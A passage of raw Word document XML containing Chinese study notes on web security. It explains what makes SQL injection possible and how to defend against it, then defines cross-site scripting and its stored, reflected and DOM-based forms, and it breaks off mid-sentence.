          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>注入条件：用户能够控制输入，要执行的程序代码会与输入的数据进行拼接</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008140D4" w:rsidRPr="00F41A4C" w:rsidRDefault="008140D4" w:rsidP="008140D4">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>防御：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008140D4" w:rsidRPr="00F41A4C" w:rsidRDefault="008140D4" w:rsidP="008140D4">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:leftChars="171" w:left="359" w:firstLineChars="228" w:firstLine="479"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>数据与代码分离</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008140D4" w:rsidRPr="00F41A4C" w:rsidRDefault="008140D4" w:rsidP="004A13F9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>最佳方式是使用预编译语句，绑定变量，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>语句的语义不会改变</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008140D4" w:rsidRPr="00F41A4C" w:rsidRDefault="008140D4" w:rsidP="008140D4">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>使用安全的存储过程对抗</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>注入，前提是避免使用动态</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>语句</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008140D4" w:rsidRPr="00F41A4C" w:rsidRDefault="008140D4" w:rsidP="008140D4">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>检查数据类型</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008140D4" w:rsidRPr="00F41A4C" w:rsidRDefault="008140D4" w:rsidP="004A13F9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>数据库使用最小权限原则，避免使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>等权限</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008140D4" w:rsidRPr="00F41A4C" w:rsidRDefault="008140D4" w:rsidP="008140D4">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">7.2 </w:t>
      </w:r>
      <w:r w:rsidR="003F06DE" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidR="003F06DE" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>是什么</w:t>
      </w:r>
      <w:r w:rsidR="002A53E4" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>？</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>如何防御</w:t>
      </w:r>
      <w:r w:rsidR="003F06DE" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E58FD" w:rsidRPr="00F41A4C" w:rsidRDefault="00126D1A" w:rsidP="009D0C20">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>又叫</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">CSS  (Cross Site Script) </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，跨站脚本攻击。它指的是</w:t>
      </w:r>
      <w:hyperlink r:id="rId253" w:tooltip="恶意攻击" w:history="1">
        <w:r w:rsidRPr="00F41A4C">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="000000"/>
            <w:sz w:val="15"/>
            <w:szCs w:val="15"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>恶意攻击</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>者往</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>页面里插入恶意</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>html</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>代码，当用户</w:t>
      </w:r>
      <w:hyperlink r:id="rId254" w:tgtFrame="_blank" w:tooltip="浏览" w:history="1">
        <w:r w:rsidRPr="00F41A4C">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="000000"/>
            <w:sz w:val="15"/>
            <w:szCs w:val="15"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>浏览</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>该页之时，嵌入其中</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>里面的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>html</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>代码会被执行，从而达到恶意用户的特殊目的</w:t>
      </w:r>
      <w:r w:rsidR="002C03C9" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D27AE" w:rsidRPr="00F41A4C" w:rsidRDefault="00E56656" w:rsidP="00E56656">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F3FFEC"/>
        <w:spacing w:after="107" w:line="258" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">　　（</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>）持久型跨站：最直接的危害类型，跨站代码存储在服务器（数据库）。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">　　（</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>）非持久型跨站：反射型跨站脚本漏洞，最普遍的类型。用户访问服务器</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>跨站链接</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>返回跨站代码。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">　　（</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>DOM</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>跨站（</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>DOM XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>:DOM(document object model</w:t>
      </w:r>
      <w:hyperlink r:id="rId255" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00F41A4C">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="2D64B3"/>
            <w:sz w:val="15"/>
            <w:szCs w:val="15"/>
          </w:rPr>
          <w:t>文档对象模型</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>，客户端脚本处理逻辑导致的安全问题。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF4320" w:rsidRPr="00F41A4C" w:rsidRDefault="00CF4320" w:rsidP="009D0C20">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">　随着</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId256" w:tgtFrame="_blank" w:tooltip="AJAX" w:history="1">
        <w:r w:rsidRPr="00F41A4C">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0268CD"/>
            <w:sz w:val="15"/>
            <w:szCs w:val="15"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>AJAX</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Asynchronous JavaScript and XML</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，异步</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>XML</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>）技术的普遍应用，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的攻击危害将被放大。使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>AJAX</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
